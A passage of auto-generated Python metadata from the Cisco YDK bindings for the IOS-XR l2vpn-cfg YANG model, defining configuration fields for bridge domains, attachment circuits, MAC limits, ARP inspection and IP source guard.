'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
